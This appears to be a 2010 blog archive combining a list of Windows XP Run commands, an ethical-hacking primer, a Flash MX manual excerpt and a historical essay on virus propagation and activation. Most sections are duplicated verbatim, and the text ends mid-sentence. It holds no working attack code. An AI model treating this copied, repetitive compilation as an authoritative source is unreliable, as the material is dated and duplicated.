Registry Editor------ - regedit
Registry Editor------ - regedit32
Remote Desktop----- -- mstsc
Removable Storage----- -- ntmsmgr.msc
Removable Storage Operator Requests---- --- ntmsoprq.msc
Resultant Set of Policy (XP Prof)------- rsop.msc
Scanners and Cameras----- -- sticpl.cpl
Scheduled Tasks------- control schedtasks
Security Center------ - wscui.cpl
Services---- --- services.msc
Shared Folders----- -- fsmgmt.msc
Shuts Down Windows----- -- shutdown
Sounds and Audio------- mmsys.cpl
Spider Solitare Card Game------- spider
SQL Client Configuration- ------ cliconfg
System Configuration Editor------ - sysedit
System Configuration Utility----- -- msconfig
System File Checker Utility (Scan Immediately) ------- sfc /scannow
System File Checker Utility (Scan Once At Next Boot)------- sfc /scanonce
System File Checker Utility (Scan On Every Boot)------- sfc /scanboot
System File Checker Utility (Return to Default Setting)---- --- sfc /revert
System File Checker Utility (Purge File Cache)------ - sfc /purgecache
System File Checker Utility (Set Cache Size to size x)------- sfc /cachesize=x
System Properties-- ----- sysdm.cpl
Task Manager----- -- taskmgr
Telnet Client------ - telnet
User Account Management-- ----- nusrmgr.cpl
Utility Manager----- -- utilman
Windows Firewall---- --- firewall.cpl
Windows Magnifier--- ---- magnify
Windows Management Infrastructure- ------ wmimgmt.msc
Accessibility Controls --------- access.cpl
Accessibility Wizard --------- accwiz
Add Hardware Wizard --------- hdwwiz.cpl
Add/Remove Programs --------- appwiz.cpl
Administrative Tools --------- control admintools
Adobe Acrobat (if installed) --------- acrobat
Adobe Designer (if installed) --------- acrodist
Adobe Distiller (if installed) --------- acrodist
Adobe ImageReady (if installed) --------- imageready
Adobe Photoshop (if installed) --------- Photoshop
Automatic Updates --------- wuaucpl.cpl
Bluetooth Transfer Wizard --------- fsquirt
Calculator --------- calc
Certificate Manager --------- certmgr.msc
Character Map --------- Charmap
Check Disk Utility --------- chkdsk
Clipboard Viewer --------- clipbrd
Command Prompt --------- cmd
Component Services --------- dcomcnfg
Computer Management --------- compmgmt.msc
Control Panel --------- control
Date and Time Properties --------- timedate.cpl
DDE Shares --------- ddeshare
Device Manager --------- devmgmt.msc
Direct X Control Panel (If Installed)* --------- directx.cpl
Direct X Troubleshooter --------- dxdiag
Disk Cleanup Utility --------- cleanmgr
Disk Defragment ------- dfrg.msc
Disk Management -------- diskmgmt.msc
Disk Partition Manager --------- diskpart
Display Properties ----------- control desktop
Display Properties ----------Desk. cpl
Display Properties (w/Appearance Tab Preselected) --------- control color
Dr. Watson System Troubleshooting Utility ------------ drwtsn32
Driver Verifier Utility ------------ verifier
Minesweeper Game -------- winmine
Mouse Properties --------- control mouse
Mouse Properties ---------- main.cpl
Nero (if installed) --------- nero
Netmeeting ------------ - conf
Network Connections ---------- control netconnections
Network Connections --------- ncpa.cpl
Network Setup Wizard ---------- netsetup.cpl
Notepad --------- notepad
Nview Desktop Manager (If Installed) ------- nvtuicpl.cpl
Object Packager ---------- packager
ODBC Data Source Administrator ------ odbccp32.cpl
On Screen Keyboard --------- osk
Opens AC3 Filter (If Installed) --------- ac3filter.cpl
Outlook Express ------------ - msimn
Paint ------------ pbrush
Password Properties -------- password.cpl
Performance Monitor ------- perfmon.msc
Performance Monitor --------- perfmon
Phone and Modem Options ------- telephon.cpl
Phone Dialer --------- dialer
Pinball Game ------------ --- pinball
Power Configuration --------- powercfg.cpl
Printers and Faxes ------- control printers
Printers Folder --------- printers
Private Character Editor --------- eudcedit
Quicktime (If Installed) --------- QuickTime.cpl
Quicktime Player (if installed) ------------ - quicktimeplayer
Real Player (if installed) ------------ - realplay
Regional Settings ----------- intl.cpl
Registry Editor --------- regedit
Registry Editor -------- regedit32
Remote Access Phonebook -------- rasphone
Remote Desktop --------- mstsc
Removable Storage --------- ntmsmgr.msc
Removable Storage Operator Requests --------- ntmsoprq.msc
Resultant Set of Policy (XP Prof) ---------- rsop.msc
Scanners and Cameras ------------ sticpl.cpl
Scheduled Tasks ----------- control schedtasks
Security Center ----------- wscui.cpl
Services ------------ -- services.msc
Shared Folders ----------- fsmgmt.msc
Shuts Down Windows ------- shutdown
Sounds and Audio ------------ mmsys.cpl
Spider Solitare Card Game -------- spider
SQL Client Configuration --------- cliconfg
System Configuration Editor --------- sysedit
System Configuration Utility --------- msconfig
System File Checker Utility (Scan Immediately) ---------- sfc /scannow
System File Checker Utility (Scan Once At Next Boot) ---------- sfc /scanonce
System File Checker Utility (Scan On Every Boot) ------------ -- sfc /scanboot
System File Checker Utility (Return to Default Setting) ----------- sfc /revert
System File Checker Utility (Purge File Cache) ------------ sfc /purgecache
System File Checker Utility (Set Cache Size to size x) ------------ sfc /cachesize=x
System Information ----------- msinfo32
System Properties --------- sysdm.cpl
Task Manager ------------ taskmgr
TCP Tester ------------ tcptest
Telnet Client --------- telnet
Tweak UI (if installed) ------------ tweakui
User Account Management ------------ nusrmgr.cpl
Utility Manager --------- utilman
Windows Address Book --------- wab
Windows Address Book Import Utility ----------- wabmig
Windows Backup Utility (if installed) ------------ ntbackup
Windows Explorer ------------ - explorer
Windows Firewall ---------- firewall.cpl
Windows Magnifier ------------ - magnify
Windows Management Infrastructure ----------- wmimgmt.msc
Windows Media Player ----------- wmplayer
Windows Messenger ------------ msmsgs
Windows Picture Import Wizard (need camera connected) --------- wiaacmgr
Windows System Security Tool ------- syskey
Windows Update Launches ------------ -- wupdmgr
Windows Version (to show which version of windows) --------- winver
Windows XP Tour Wizard ------------ - tourstart
Event Viewer ----------- eventvwr.msc
Files and Settings Transfer Tool ---------- migwiz
File Signature Verification Tool -------- sigverif
Findfast ---------- findfast.cpl
Firefox (if installed) -------- firefox
Folders Properties ---------- control folders
Fonts ---------- control fonts
Fonts Folder ------------ fonts
Free Cell Card Game ------- freecell
Game Controllers --------- joy.cpl
Group Policy Editor (XP Prof) --------- gpedit.msc
Hearts Card Game ----------- mshearts
Help and Support ------- helpctr
HyperTerminal ----------- hypertrm
Iexpress Wizard ---------- iexpress
Indexing Service ---------- ciadv.msc
Internet Connection Wizard -------- icwconn1
Internet Explorer ---------- iexplore
Internet Properties --------- inetcpl.cpl
Internet Setup Wizard ------- inetwiz
Java Control Panel (If Installed) --------- jpicpl32.cpl
Java Control Panel (If Installed) --------- javaws
Keyboard Properties ----------- control keyboard
Local Security Settings --------- secpol.msc
Local Users and Groups ------------ - lusrmgr.msc
Logs You Out Of Windows ---------- logoff
Malicious Software Removal Tool ----------- mrt
Microsoft Access (if installed) ------------ - access.cpl
Microsoft Chat ------------ - winchat
Microsoft Excel (if installed) ----------- excel
Microsoft Frontpage (if installed) ----------- frontpg
Microsoft Movie Maker ----------- moviemk
Microsoft Paint ------------ mspaint
Microsoft Powerpoint (if installed) --------- powerpnt
Microsoft Word (if installed) ---------- winword
Microsoft Syncronization Tool ---------- mobsync
Monday, June 21, 2010
Introduction to Ethical Hacking
How Hackers Beget Ethical Hackers
We’ve all heard of hackers. Many of us have even suffered the consequences
of hacker actions. So who are these hackers? Why is it important to know
about them? The next few sections give you the lowdown on hackers.
Defining hacker
Hacker is a word that has two meanings:
Traditionally, a hacker is someone who likes to tinker with software or
electronic systems. Hackers enjoy exploring and learning how computer
systems operate. They love discovering new ways to work electronically
Recently, hacker has taken on a new meaning — someone who maliciously
breaks into systems for personal gain. Technically, these criminals are
crackers (criminal hackers). Crackers break into (crack) systems with
malicious intent. They are out for personal gain: fame, profit, and even
revenge. They modify, delete, and steal critical information, often making
other people miserable
The good-guy (white-hat) hackers don’t like being in the same category as the
bad-guy (black-hat) hackers. (These terms come from Western movies where
the good guys wore white cowboy hats and the bad guys wore black cowboy
hats.) Whatever the case, most people give hacker a negative connotation.
Many malicious hackers claim that they don’t cause damage but instead are
altruistically helping others. Yeah, right. Many malicious hackers are electronic
thieves.
Hackers (or bad guys) try to compromise computers.
Ethical hackers (or good guys) protect computers against illicit entry.
Hackers go for almost any system they think they can compromise. Some
prefer prestigious, well-protected systems, but hacking into anyone’s system
increases their status in hacker circles.
We’ve all heard of hackers. Many of us have even suffered the consequences
of hacker actions. So who are these hackers? Why is it important to know
about them? The next few sections give you the lowdown on hackers.
Defining hacker
Hacker is a word that has two meanings:
Traditionally, a hacker is someone who likes to tinker with software or
electronic systems. Hackers enjoy exploring and learning how computer
systems operate. They love discovering new ways to work electronically
Recently, hacker has taken on a new meaning — someone who maliciously
breaks into systems for personal gain. Technically, these criminals are
crackers (criminal hackers). Crackers break into (crack) systems with
malicious intent. They are out for personal gain: fame, profit, and even
revenge. They modify, delete, and steal critical information, often making
other people miserable
The good-guy (white-hat) hackers don’t like being in the same category as the
bad-guy (black-hat) hackers. (These terms come from Western movies where
the good guys wore white cowboy hats and the bad guys wore black cowboy
hats.) Whatever the case, most people give hacker a negative connotation.
Many malicious hackers claim that they don’t cause damage but instead are
altruistically helping others. Yeah, right. Many malicious hackers are electronic
thieves.
Hackers (or bad guys) try to compromise computers.
Ethical hackers (or good guys) protect computers against illicit entry.
Hackers go for almost any system they think they can compromise. Some
prefer prestigious, well-protected systems, but hacking into anyone’s system
increases their status in hacker circles.
Friday, June 18, 2010
WORKING WIT FLASH
Moving the view of the Stage
When the Stage is magnified, you may not be able to see all of it. The Hand tool lets you move
the Stage to change the view without having to change the magnification.
To move the Stage view:
1 In the toolbox, select the Hand tool. To temporarily switch between another tool and the
Hand tool, hold down the Spacebar and click the tool in the toolbox.
2 Drag the Stage.
Using the grid, guides, and rulers
Flash comes with rulers and guides that help you draw and lay out objects precisely. You can place
guides in a document and snap objects to those guides, or turn on the grid and snap objects to it.
Using the grid
When the grid is displayed in a document, it appears as a set of lines behind the artwork in all
scenes. You can snap objects to the grid, and you can modify the grid size and grid line color.
To display or hide the drawing grid:
Choose View > Grid > Show Grid.
To turn snapping to grid lines on or off:
Choose View > Grid > Snap to Grid.
To set grid preferences:
1 Choose View > Grid > Edit Grid.
2 For Color, click the triangle in the color box and select a grid line color from the palette.
The default grid line color is gray.
3 Select or deselect Show Grid to display or hide the grid.
4 Select or deselect Snap to Grid to turn snapping to grid lines on or off.
5 For grid spacing, enter values in the text boxes to the right of the horizontal and vertical arrows.
6 For Snap Accuracy, select an option from the pop-up menu.
7 If you want to save the current settings as the default, click Save Default.
Using guides
You can drag horizontal and vertical guides from the rulers onto the Stage when the rulers are
displayed. You can move guides, lock guides, hide guides, and remove guides. You can also snap
objects to guides, and change guide color and snap tolerance (how close objects must be to snap
to a guide). Draggable guides appear only in the Timeline in which they were created.
To create custom guides or irregular guides, you use guide layers. See “Using guide layers” on =
To display or hide the drawing guides:
Choose View > Guides > Show Guides.
Note: If the grid is visible and Snap to Grid is turned on when you create guides, guides will snap to the grid.
To turn snapping to guides on or off:
Choose View > Guides > Snap to Guides.
Note: Snapping to guides takes precedence over snapping to the grid in places where guides fall between grid lines.
To move a guide:
Use the Arrow tool to drag the guide.
Working in Flash 21
To remove a guide:
With guides unlocked, use the Arrow tool to drag the guide to the horizontal or vertical ruler. For
information on locking and unlocking guides, see the following procedure.
To set guide preferences:
1 Choose View > Guides > Edit Guides.
2 For Color, click the triangle in the color box and select a guide line color from the palette.
The default guide color is green.
3 Select or deselect Show Guides to display or hide guides.
4 Select or deselect Snap to Guides to turn snapping to guides on or off.
5 Select or deselect Lock Guides to lock or unlock guides.
6 For Snap Accuracy, select an option from the pop-up menu.
7 If you want to remove all guides, click Clear All.
Note: Clear All removes all guides from the current scene.
8 If you want to save the current settings as the default, click Save Default.
Using rulers
When rulers are displayed, they appear along the top and left sides of the document. You can
change the unit of measure used in the rulers from the default of pixels. When you move an
element on the Stage with the rulers displayed, lines indicating the element’s dimensions appear
on the rulers.
To display or hide rulers:
Choose View > Rulers.
To specify the rulers’ unit of measure for a document:
Choose Modify > Document, and then select an option from the pop-up menu at the upper right.
Creating a new document
Each time you open Flash, the application creates a new file with the FLA extension. You can
create additional new Flash documents as you work. To set the size, frame rate, background color,
and other properties of a new document, you use the Document Properties dialog box.
You can also open a template as a new document. You can choose from standard templates that
ship with Flash, or open a template you have saved previously. For information on saving a
document file as a template, see “Saving Flash documents”.
To create a new document and set its properties:
1 Choose File > New.
2 Choose Modify > Document.
The Document Properties dialog box appears.
22 Chapter 1
3 For Frame Rate, enter the number of animation frames to be displayed every second. For
most computer-displayed animations, especially those playing from a Web site, 8 fps (frames
per second) to 12 fps is sufficient. (12 fps is the default frame rate.)
4 For Dimensions, do one of the following:
• To specify the Stage size in pixels, enter values in the Width and Height text boxes.
The default movie size is 550 x 400 pixels. The minimum size is 1 x 1 pixels; the maximum is
2880 x 2880 pixels.
• To set the Stage size so that there is equal space around the content on all sides, click the
Contents button to the right of Match. To minimize movie size, align all elements to the upper
left corner of the Stage, and then click Contents.
• To set the Stage size to the maximum available print area, click Printer. This area is determined
by the paper size minus the current margin selected in the Margins area of the Page Setup
dialog box (Windows) or the Print Margins dialog box (Macintosh).
• To set the Stage size to the default size, click Default.
5 To set the background color of your movie, click the triangle in the Background Color box and
select a color from the palette.
6 To specify the unit of measure for rulers that you can display along the top and side of the
application window, select an option from the pop-up menu in the upper right. See “Using
rulers” on page 21. (This setting also determines the units used in the Info panel.)
7 Do one of the following:
• To make the new settings the default properties for your new document only, click OK.
• To make these settings the default properties for all new documents, click Make Default.
To open a template as a new document:
1 Choose File > New from Template.
2 In the New Document dialog box, select a category from the Category list, and select a
document from the Category Items list.
3 Click OK.
Setting preferences in Flash
Flash lets you set preferences for general application operations, editing operations, and
Clipboard operations. See also “Choosing drawing settings”\.
To set preferences:
1 Choose Edit > Preferences.
2 Click the General, Editing, Clipboard, Warning, or ActionScript Editor tab, and choose from the
respective options as described in the procedures that follow. For more information on
ActionScript Editor preferences, see “Setting Actions panel preferences” under Help > Using
Flash.
Working in Flash 23
To set general preferences, choose from the following options:
• For Undo Levels, enter a value from 0 to 200 to set the number of undo/redo levels. Undo
levels require memory; the more undo levels you use, the more system memory is taken up.
The default is 100.
• For Printing Options (Windows only), select Disable PostScript to disable PostScript
output when printing to a PostScript printer. By default, this option is deselected. Select this
option if you have problems printing to a PostScript printer, but keep in mind that this will
slow down printing.
• For Selection Options, select or deselect Shift Select to control how Flash handles selection of
multiple elements. When Shift Select is off, clicking additional elements adds them to the
current selection. When Shift Select is on, clicking additional elements deselects other
elements unless you hold down the Shift key.
• Select Show Tooltips to display tooltips when the pointer pauses over a control. Deselect this
option if you don’t want to see the tooltips.
• For Timeline Options, select Disable Timeline Docking to keep the Timeline from attaching
itself to the application window once it has been separated into its own window. For more
information, see “Using the Timeline”
• Select Span Based Selection to use span-based selection in the Timeline, rather than the default
frame-based selection (Flash 5 used span-based selection). For more information on span-based
and frame-based selection, see “Working with frames in the Timeline”
• Select Named Anchor on Scenes to have Flash make the first frame of each scene in a movie a
named anchor. Named anchors let you use the Forward and Back buttons in a browser to jump
from scene to scene in a movie. For more information, see “Using named anchors”
• For Highlight Color, select Use This Color and select a color from the palette, or select Use
Layer Color to use the current layer’s outline color.
• For Font Mapping Default, select a font to use when substituting missing fonts in movies you
open in Flash. See “Substituting missing fonts”.
To set editing preferences, choose from the following options:
• For Pen Tool options, see “Setting Pen tool preferences” .
• For Vertical Text options, select Default Text Orientation to make the default orientation of
text vertical, which is useful for some Asian language fonts. By default, this option is
deselected.
• Select Right to Left Text Flow to reverse the default text display direction. This option is
deselected by default.
• Select No Kerning to turn off kerning for vertical text. This option is deselected by default, but
is useful to improve spacing for some fonts that use kerning tables.
• For Drawing Settings, see “Choosing drawing settings”
To set Clipboard preferences, choose from the following options:
• For Bitmaps (Windows only), select options for Color Depth and Resolution to specify these
parameters for bitmaps copied to the Clipboard. Select Smooth to apply anti-aliasing. Enter a
value in the Size Limit text box to specify the amount of RAM that is used when placing a
bitmap image on the Clipboard. Increase this value when working with large or
high-resolution bitmap images. If your computer has limited memory, choose None.
• For Gradients (Windows only), choose an option to specify the quality of gradient fills placed
in the Windows Metafile. Choosing a higher quality increases the time required to copy
artwork. Use this setting to specify gradient quality when pasting items to a location outside of
Flash. When you are pasting within Flash, the full gradient quality of the copied data is
preserved regardless of the Gradients on Clipboard setting.
• For PICT Settings (Macintosh only), for Type, select Objects to preserve data copied to the
Clipboard as vector artwork, or select one of the bitmap formats to convert the copied artwork
to a bitmap. Enter a value for Resolution. Select Include PostScript to include PostScript data.
For Gradients, choose an option to specify gradient quality in the PICT. Choosing a higher
quality increases the time required to copy artwork. Use the Gradients setting to specify
gradient quality when pasting items to a location outside of Flash. When you are pasting within
Flash, the full gradient quality of the copied data is preserved regardless of the Gradient setting.
• For FreeHand Text, select Maintain Text as Blocks to keep text editable in a pasted FreeHand file.
To set warning preferences, choose one of the following options:
• Select Warn on Save for Macromedia Flash 5 Compatibility to have Flash warn you when you
try to save documents with Flash MX–specific content to a Flash 5 file. This option is selected
by default.
• Select Warn on Missing Fonts to have Flash warn you when you open a Flash document that
uses fonts that are not installed on your computer. This option is selected by default.
• Select Warn on Loss of Expert Mode Formatting to have Flash warn you of any expert mode
formatting that will be lost when you switch to normal mode in the Actions panel. This option
is selected by default.
• Select Warn on Reading Generator Content to have Flash display a red “X” over any Generator
objects, as a reminder that Generator objects are not supported in Flash MX.
• Select Warn on Inserting Frames when Importing Content to have Flash alert you when it
inserts frames in your document to accommodate audio or video files that you import.
When the Stage is magnified, you may not be able to see all of it. The Hand tool lets you move
the Stage to change the view without having to change the magnification.
To move the Stage view:
1 In the toolbox, select the Hand tool. To temporarily switch between another tool and the
Hand tool, hold down the Spacebar and click the tool in the toolbox.
2 Drag the Stage.
Using the grid, guides, and rulers
Flash comes with rulers and guides that help you draw and lay out objects precisely. You can place
guides in a document and snap objects to those guides, or turn on the grid and snap objects to it.
Using the grid
When the grid is displayed in a document, it appears as a set of lines behind the artwork in all
scenes. You can snap objects to the grid, and you can modify the grid size and grid line color.
To display or hide the drawing grid:
Choose View > Grid > Show Grid.
To turn snapping to grid lines on or off:
Choose View > Grid > Snap to Grid.
To set grid preferences:
1 Choose View > Grid > Edit Grid.
2 For Color, click the triangle in the color box and select a grid line color from the palette.
The default grid line color is gray.
3 Select or deselect Show Grid to display or hide the grid.
4 Select or deselect Snap to Grid to turn snapping to grid lines on or off.
5 For grid spacing, enter values in the text boxes to the right of the horizontal and vertical arrows.
6 For Snap Accuracy, select an option from the pop-up menu.
7 If you want to save the current settings as the default, click Save Default.
Using guides
You can drag horizontal and vertical guides from the rulers onto the Stage when the rulers are
displayed. You can move guides, lock guides, hide guides, and remove guides. You can also snap
objects to guides, and change guide color and snap tolerance (how close objects must be to snap
to a guide). Draggable guides appear only in the Timeline in which they were created.
To create custom guides or irregular guides, you use guide layers. See “Using guide layers” on =
To display or hide the drawing guides:
Choose View > Guides > Show Guides.
Note: If the grid is visible and Snap to Grid is turned on when you create guides, guides will snap to the grid.
To turn snapping to guides on or off:
Choose View > Guides > Snap to Guides.
Note: Snapping to guides takes precedence over snapping to the grid in places where guides fall between grid lines.
To move a guide:
Use the Arrow tool to drag the guide.
Working in Flash 21
To remove a guide:
With guides unlocked, use the Arrow tool to drag the guide to the horizontal or vertical ruler. For
information on locking and unlocking guides, see the following procedure.
To set guide preferences:
1 Choose View > Guides > Edit Guides.
2 For Color, click the triangle in the color box and select a guide line color from the palette.
The default guide color is green.
3 Select or deselect Show Guides to display or hide guides.
4 Select or deselect Snap to Guides to turn snapping to guides on or off.
5 Select or deselect Lock Guides to lock or unlock guides.
6 For Snap Accuracy, select an option from the pop-up menu.
7 If you want to remove all guides, click Clear All.
Note: Clear All removes all guides from the current scene.
8 If you want to save the current settings as the default, click Save Default.
Using rulers
When rulers are displayed, they appear along the top and left sides of the document. You can
change the unit of measure used in the rulers from the default of pixels. When you move an
element on the Stage with the rulers displayed, lines indicating the element’s dimensions appear
on the rulers.
To display or hide rulers:
Choose View > Rulers.
To specify the rulers’ unit of measure for a document:
Choose Modify > Document, and then select an option from the pop-up menu at the upper right.
Creating a new document
Each time you open Flash, the application creates a new file with the FLA extension. You can
create additional new Flash documents as you work. To set the size, frame rate, background color,
and other properties of a new document, you use the Document Properties dialog box.
You can also open a template as a new document. You can choose from standard templates that
ship with Flash, or open a template you have saved previously. For information on saving a
document file as a template, see “Saving Flash documents”.
To create a new document and set its properties:
1 Choose File > New.
2 Choose Modify > Document.
The Document Properties dialog box appears.
22 Chapter 1
3 For Frame Rate, enter the number of animation frames to be displayed every second. For
most computer-displayed animations, especially those playing from a Web site, 8 fps (frames
per second) to 12 fps is sufficient. (12 fps is the default frame rate.)
4 For Dimensions, do one of the following:
• To specify the Stage size in pixels, enter values in the Width and Height text boxes.
The default movie size is 550 x 400 pixels. The minimum size is 1 x 1 pixels; the maximum is
2880 x 2880 pixels.
• To set the Stage size so that there is equal space around the content on all sides, click the
Contents button to the right of Match. To minimize movie size, align all elements to the upper
left corner of the Stage, and then click Contents.
• To set the Stage size to the maximum available print area, click Printer. This area is determined
by the paper size minus the current margin selected in the Margins area of the Page Setup
dialog box (Windows) or the Print Margins dialog box (Macintosh).
• To set the Stage size to the default size, click Default.
5 To set the background color of your movie, click the triangle in the Background Color box and
select a color from the palette.
6 To specify the unit of measure for rulers that you can display along the top and side of the
application window, select an option from the pop-up menu in the upper right. See “Using
rulers” on page 21. (This setting also determines the units used in the Info panel.)
7 Do one of the following:
• To make the new settings the default properties for your new document only, click OK.
• To make these settings the default properties for all new documents, click Make Default.
To open a template as a new document:
1 Choose File > New from Template.
2 In the New Document dialog box, select a category from the Category list, and select a
document from the Category Items list.
3 Click OK.
Setting preferences in Flash
Flash lets you set preferences for general application operations, editing operations, and
Clipboard operations. See also “Choosing drawing settings”\.
To set preferences:
1 Choose Edit > Preferences.
2 Click the General, Editing, Clipboard, Warning, or ActionScript Editor tab, and choose from the
respective options as described in the procedures that follow. For more information on
ActionScript Editor preferences, see “Setting Actions panel preferences” under Help > Using
Flash.
Working in Flash 23
To set general preferences, choose from the following options:
• For Undo Levels, enter a value from 0 to 200 to set the number of undo/redo levels. Undo
levels require memory; the more undo levels you use, the more system memory is taken up.
The default is 100.
• For Printing Options (Windows only), select Disable PostScript to disable PostScript
output when printing to a PostScript printer. By default, this option is deselected. Select this
option if you have problems printing to a PostScript printer, but keep in mind that this will
slow down printing.
• For Selection Options, select or deselect Shift Select to control how Flash handles selection of
multiple elements. When Shift Select is off, clicking additional elements adds them to the
current selection. When Shift Select is on, clicking additional elements deselects other
elements unless you hold down the Shift key.
• Select Show Tooltips to display tooltips when the pointer pauses over a control. Deselect this
option if you don’t want to see the tooltips.
• For Timeline Options, select Disable Timeline Docking to keep the Timeline from attaching
itself to the application window once it has been separated into its own window. For more
information, see “Using the Timeline”
• Select Span Based Selection to use span-based selection in the Timeline, rather than the default
frame-based selection (Flash 5 used span-based selection). For more information on span-based
and frame-based selection, see “Working with frames in the Timeline”
• Select Named Anchor on Scenes to have Flash make the first frame of each scene in a movie a
named anchor. Named anchors let you use the Forward and Back buttons in a browser to jump
from scene to scene in a movie. For more information, see “Using named anchors”
• For Highlight Color, select Use This Color and select a color from the palette, or select Use
Layer Color to use the current layer’s outline color.
• For Font Mapping Default, select a font to use when substituting missing fonts in movies you
open in Flash. See “Substituting missing fonts”.
To set editing preferences, choose from the following options:
• For Pen Tool options, see “Setting Pen tool preferences” .
• For Vertical Text options, select Default Text Orientation to make the default orientation of
text vertical, which is useful for some Asian language fonts. By default, this option is
deselected.
• Select Right to Left Text Flow to reverse the default text display direction. This option is
deselected by default.
• Select No Kerning to turn off kerning for vertical text. This option is deselected by default, but
is useful to improve spacing for some fonts that use kerning tables.
• For Drawing Settings, see “Choosing drawing settings”
To set Clipboard preferences, choose from the following options:
• For Bitmaps (Windows only), select options for Color Depth and Resolution to specify these
parameters for bitmaps copied to the Clipboard. Select Smooth to apply anti-aliasing. Enter a
value in the Size Limit text box to specify the amount of RAM that is used when placing a
bitmap image on the Clipboard. Increase this value when working with large or
high-resolution bitmap images. If your computer has limited memory, choose None.
• For Gradients (Windows only), choose an option to specify the quality of gradient fills placed
in the Windows Metafile. Choosing a higher quality increases the time required to copy
artwork. Use this setting to specify gradient quality when pasting items to a location outside of
Flash. When you are pasting within Flash, the full gradient quality of the copied data is
preserved regardless of the Gradients on Clipboard setting.
• For PICT Settings (Macintosh only), for Type, select Objects to preserve data copied to the
Clipboard as vector artwork, or select one of the bitmap formats to convert the copied artwork
to a bitmap. Enter a value for Resolution. Select Include PostScript to include PostScript data.
For Gradients, choose an option to specify gradient quality in the PICT. Choosing a higher
quality increases the time required to copy artwork. Use the Gradients setting to specify
gradient quality when pasting items to a location outside of Flash. When you are pasting within
Flash, the full gradient quality of the copied data is preserved regardless of the Gradient setting.
• For FreeHand Text, select Maintain Text as Blocks to keep text editable in a pasted FreeHand file.
To set warning preferences, choose one of the following options:
• Select Warn on Save for Macromedia Flash 5 Compatibility to have Flash warn you when you
try to save documents with Flash MX–specific content to a Flash 5 file. This option is selected
by default.
• Select Warn on Missing Fonts to have Flash warn you when you open a Flash document that
uses fonts that are not installed on your computer. This option is selected by default.
• Select Warn on Loss of Expert Mode Formatting to have Flash warn you of any expert mode
formatting that will be lost when you switch to normal mode in the Actions panel. This option
is selected by default.
• Select Warn on Reading Generator Content to have Flash display a red “X” over any Generator
objects, as a reminder that Generator objects are not supported in Flash MX.
• Select Warn on Inserting Frames when Importing Content to have Flash alert you when it
inserts frames in your document to accommodate audio or video files that you import.
Thursday, June 17, 2010
Viral operations
Viral operations
Although the "original" definition of computer viral programs
refers to reproduction by attaching to other programs, viri that
act in this manner having been less successful than those that
use other means. In the personal computer world, boot sector
infectors have been much more effective. (Examples in the
MS-DOS community are the BRAIN and Stoned viral programs.
Examples in the Mac realm are not as clear, but the WDEF virus
could be said to be a type of boot sector infector, as the WDEF
resource is one that is run automatically as soon as any Mac
disk is inserted, although this has changed under System 7.)
In larger systems, mini and mainframe computers, network and
mail viral programs have, so far, had the greatest impact. The
Morris/Internet/UNIX worm managed to spread and reproduce using
the facility of networked machines to submit programs to each
other. (A VMS program, WANK, used many of the same techniques.)
The CHRISTMA EXEC used mainframe mail commands, and the ability
to submit programs by mail, in order to reproduce copies which
eventually flooded the network.
Network and mail viral programs carry, in a sense, their own
payload. The reproduction of the programs themselves uses the
resources of the hosts affected, and in the cases of both the
Morris and CHRISTMA worms went so far as to deny service to
users by using all available computing or communications
resources.
Most other viral programs seem to be written "for their own
sake". A kind of electronic graffiti which writes itself on
further walls. However, even these can do damage, as with the
Stoned virus, which overwrites sections of the FAT with the
original boot sector. Some appear to be written as pranks, and
others as a kind of advertising, although the potential for
damage from even "benign" viri cannot be considered funny, and
the "advertising" viri probably don't engender much goodwill.
Relatively few viral programs carry a deliberately damaging
payload. Those which do attempt to erase infected programs or
disks are, fortunately, self limiting.
The last payload, or function, which a viral program may carry,
is some kind of intelligence to enable it to evade detection.
So far the various kinds of evasive action; self-modification,
multiple encryption and "stealth" activity; have not proven to
have any advantageous "survival" characteristics. In one sense,
this is to be regretted, as it demonstrates that the majority of
computer users are not taking the most elementary precautions to
defend against viral programs.
Although the "original" definition of computer viral programs
refers to reproduction by attaching to other programs, viri that
act in this manner having been less successful than those that
use other means. In the personal computer world, boot sector
infectors have been much more effective. (Examples in the
MS-DOS community are the BRAIN and Stoned viral programs.
Examples in the Mac realm are not as clear, but the WDEF virus
could be said to be a type of boot sector infector, as the WDEF
resource is one that is run automatically as soon as any Mac
disk is inserted, although this has changed under System 7.)
In larger systems, mini and mainframe computers, network and
mail viral programs have, so far, had the greatest impact. The
Morris/Internet/UNIX worm managed to spread and reproduce using
the facility of networked machines to submit programs to each
other. (A VMS program, WANK, used many of the same techniques.)
The CHRISTMA EXEC used mainframe mail commands, and the ability
to submit programs by mail, in order to reproduce copies which
eventually flooded the network.
Network and mail viral programs carry, in a sense, their own
payload. The reproduction of the programs themselves uses the
resources of the hosts affected, and in the cases of both the
Morris and CHRISTMA worms went so far as to deny service to
users by using all available computing or communications
resources.
Most other viral programs seem to be written "for their own
sake". A kind of electronic graffiti which writes itself on
further walls. However, even these can do damage, as with the
Stoned virus, which overwrites sections of the FAT with the
original boot sector. Some appear to be written as pranks, and
others as a kind of advertising, although the potential for
damage from even "benign" viri cannot be considered funny, and
the "advertising" viri probably don't engender much goodwill.
Relatively few viral programs carry a deliberately damaging
payload. Those which do attempt to erase infected programs or
disks are, fortunately, self limiting.
The last payload, or function, which a viral program may carry,
is some kind of intelligence to enable it to evade detection.
So far the various kinds of evasive action; self-modification,
multiple encryption and "stealth" activity; have not proven to
have any advantageous "survival" characteristics. In one sense,
this is to be regretted, as it demonstrates that the majority of
computer users are not taking the most elementary precautions to
defend against viral programs.
Viral activation
Viral activation
In attempting to protect against viral infection, and
particularly when trying to disinfect systems, it is important to
bear in mind the times that the virus is actively "infectious".
The viral activation is not the same as the activation of the
payload that a virus may carry. For example, the payload of the
original "Stoned" virus was a message which appeared on the
screen saying "Your PC is now Stoned!". This message only
appears at boot time, and on only one eighth of the times the
computer is rebooted. The virus, however, is infectious at all
times, if it has infected the hard disk.
There are basically three possibilities for the infectious
period: now ("one-shot"), during program run ("while called") or
from now on (resident). These periods may be modified by other
circumstances. A resident virus may remain in memory, but only
be actively infecting when a disk is accessed. A "while called"
virus may only infect a new program when a directory is changed.
"One-shot" viri only get one chance on each "run" of the infected
program. The viral code will seek out and infect a target
program. They then pass control to the original program, and
perform no further functions. These are, of course, the simplest
of the viral programs. Mainframe "mail" viri are generally of
this type.
The second class will activate when the infected program is
called, and then pass partial control to the original program.
The virus, however, will remain operational during the time that
the infected program is running. If this can be accomplished, it
is only a slight jump to write a fully memory resident virus.
Resident viri are the most successful, and the most dangerous, of
viral programs. A resident virus will become active when an
infected program is run (or at boot time for boot sector
infectors), and remain active until the computer is rebooted or
turned off. (Some viral programs are even able to trap the
rebooting sequence that is normally called when you press Ctrl-
